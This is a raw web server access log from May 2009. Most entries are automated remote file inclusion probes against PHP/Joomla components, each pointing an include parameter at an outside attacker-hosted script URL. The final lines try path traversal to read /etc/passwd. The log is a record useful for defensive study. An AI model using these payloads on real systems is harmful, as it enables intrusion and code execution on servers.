202.177.22.67 - - [19/May/2009:00:16:47 -0400] "GET /logs/error_log.Q108051600//errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
77.221.151.178 - - [19/May/2009:00:17:07 -0400] "GET /logs/access_log.Q108121900%20%20//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:17:07 -0400] "GET /logs/access_log.Q108120600%20%20//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:18:10 -0400] "GET /logs/access_log.Q108102400/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:18:10 -0400] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:18:10 -0400] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.231.24.38 - - [19/May/2009:00:18:15 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:15 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:16 -0400] "GET /logs/access_log.Q108081600/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:16 -0400] "GET /errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:16 -0400] "GET /errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:16 -0400] "GET /logs/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:17 -0400] "GET /logs/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:17 -0400] "GET /errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:18:17 -0400] "GET /logs/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:00:19:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.24.38 - - [19/May/2009:00:19:47 -0400] "GET /logs/error_log.Q109042000/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:19:48 -0400] "GET /logs/error_log.Q109042000/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.231.24.38 - - [19/May/2009:00:19:50 -0400] "GET /logs/error_log.Q109042000/errors.php?error=http://www.natma.co.cc/ui/includes/zip/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
211.115.89.68 - - [19/May/2009:00:20:20 -0400] "GET /logs/access_log.Q108090200/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.221.151.178 - - [19/May/2009:00:21:15 -0400] "GET /logs/access_log.Q108112400//galeria.php?start=0&kategoria=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:24:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.89.68 - - [19/May/2009:00:24:39 -0400] "GET /logs/access_log.Q108082500%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:24:48 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:24:48 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:24:49 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:24:52 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:24:52 -0400] "GET /logs/access_log.Q109041200//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:24:52 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:00:25:17 -0400] "GET /logs/error_log.Q107101900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.121.201.70 - - [19/May/2009:00:25:37 -0400] "GET /logs/access_log.Q109050700//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
211.115.89.68 - - [19/May/2009:00:25:44 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:25:45 -0400] "GET /logs/access_log.Q109032900//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:25:56 -0400] "GET /logs/access_log.Q109013100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:25:57 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.148.35.35 - - [19/May/2009:00:26:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SPOENB/1.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SPOENB/1.0; IEMB3; IEMB3)"
98.148.35.35 - - [19/May/2009:00:26:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SPOENB/1.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SPOENB/1.0; IEMB3; IEMB3)"
98.148.35.35 - - [19/May/2009:00:26:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SPOENB/1.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SPOENB/1.0; IEMB3; IEMB3)"
98.148.35.35 - - [19/May/2009:00:26:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SPOENB/1.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; SPOENB/1.0; IEMB3; IEMB3)"
208.64.202.135 - - [19/May/2009:00:26:36 -0400] "GET /logs/error_log.Q108110100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
208.64.202.135 - - [19/May/2009:00:26:37 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
208.64.202.135 - - [19/May/2009:00:26:37 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
208.64.202.135 - - [19/May/2009:00:26:38 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [19/May/2009:00:26:38 -0400] "GET /logs/error_log.Q108110100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [19/May/2009:00:26:38 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
121.101.159.16 - - [19/May/2009:00:26:58 -0400] "GET /logs/error_log.Q108110100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alex-fantasy.at/news/inc/output/3.txt??%0D?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
121.101.159.16 - - [19/May/2009:00:26:58 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alex-fantasy.at/news/inc/output/3.txt??%0D?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
121.101.159.16 - - [19/May/2009:00:26:58 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alex-fantasy.at/news/inc/output/3.txt??%0D?? HTTP/1.1" 404 266 "-" "libwww-perl/5.803"
121.101.159.16 - - [19/May/2009:00:26:58 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.alex-fantasy.at/news/inc/output/3.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
208.64.202.135 - - [19/May/2009:00:26:59 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [19/May/2009:00:27:00 -0400] "GET /logs/access_log.Q108090700/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
88.191.103.144 - - [19/May/2009:00:27:12 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:27:12 -0400] "GET /logs/access_log.Q109051100%20%20//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:27:12 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
207.45.176.186 - - [19/May/2009:00:28:52 -0400] "GET /index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
207.45.176.186 - - [19/May/2009:00:29:14 -0400] "GET /logs/index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
207.45.176.186 - - [19/May/2009:00:29:14 -0400] "GET /logs/access_log.Q108091400%20%20/index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:29:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.45.176.186 - - [19/May/2009:00:29:42 -0400] "GET /logs/access_log.Q108073000%20%20/index.php?path[docroot]=http://keramput.net/whmcs/id.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.115.89.68 - - [19/May/2009:00:30:27 -0400] "GET /logs/access_log.Q108122500/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:00:30:54 -0400] "GET /logs/access_log.Q108122900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.121.201.70 - - [19/May/2009:00:31:12 -0400] "GET /logs/access_log.Q108040300//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [19/May/2009:00:31:13 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [19/May/2009:00:31:13 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 1959 "-" "libwww-perl/5.65"
72.30.79.49 - - [19/May/2009:00:31:43 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):07+RNSUBS(S0040):02 HTTP/1.0" 200 65456 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.119.103.12 - - [19/May/2009:00:31:47 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:00:31:47 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:00:31:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
91.121.210.42 - - [19/May/2009:00:32:08 -0400] "GET /logs/access_log.Q109041200%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:32:28 -0400] "GET /logs/access_log.Q109032900%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:33:06 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.165.73.157 - - [19/May/2009:00:33:27 -0400] "GET /index.php?stranica=http://208.98.22.241/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:33:27 -0400] "GET /logs/access_log.Q109041300/index.php?stranica=http://208.98.22.241/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:33:27 -0400] "GET /logs/index.php?stranica=http://208.98.22.241/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:33:34 -0400] "GET /logs/error_log.Q109041300/index.php?stranica=http://208.98.22.241/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
216.119.103.12 - - [19/May/2009:00:33:54 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
212.150.52.114 - - [19/May/2009:00:34:04 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:34:17 -0400] "GET /?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:34:23 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:34:23 -0400] "GET /logs/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
123.220.177.181 - - [19/May/2009:00:34:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; ja-JP-mac; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
123.220.177.181 - - [19/May/2009:00:34:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; ja-JP-mac; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
123.220.177.181 - - [19/May/2009:00:34:28 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; ja-JP-mac; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
123.220.177.181 - - [19/May/2009:00:34:28 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; ja-JP-mac; rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10"
209.59.12.99 - - [19/May/2009:00:34:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.150.52.114 - - [19/May/2009:00:35:22 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
212.150.52.114 - - [19/May/2009:00:35:42 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.135.14 - - [19/May/2009:00:35:44 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:00:35:45 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
87.106.135.14 - - [19/May/2009:00:35:45 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
212.150.52.114 - - [19/May/2009:00:36:25 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:36:30 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:36:35 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:36:35 -0400] "GET /logs/access_log.Q109042500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:37:04 -0400] "GET /logs/access_log.Q108082400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:37:06 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:37:06 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:37:09 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:37:13 -0400] "GET /logs/access_log.Q109042500//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:37:13 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:37:33 -0400] "GET /logs/access_log.Q108082400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:37:48 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:37:48 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
116.121.201.70 - - [19/May/2009:00:38:07 -0400] "GET /logs/error_log.Q108040300//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
87.106.135.14 - - [19/May/2009:00:38:15 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:00:38:45 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:00:38:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:00:38:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
217.18.76.16 - - [19/May/2009:00:39:02 -0400] "GET /logs/error_log.Q109042000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:00:39:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.64.202.135 - - [19/May/2009:00:39:52 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
208.64.202.135 - - [19/May/2009:00:39:55 -0400] "GET /logs/access_log.Q108082900/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.project80s.com/id.gif??? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
88.191.103.144 - - [19/May/2009:00:40:26 -0400] "GET /logs/access_log.Q109042500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:40:30 -0400] "GET /logs/access_log.Q108082400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:40:56 -0400] "GET /logs/access_log.Q109042500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:41:00 -0400] "GET /logs/access_log.Q108082400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:00:41:07 -0400] "GET /images/_notes/nav_store_hist_blue.jpg.mno HTTP/1.0" 200 247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.151.233.72 - - [19/May/2009:00:41:35 -0400] "GET /logs/access_log.Q108091100//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:41:35 -0400] "GET /logs/access_log.Q109042200//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:41:35 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:41:35 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
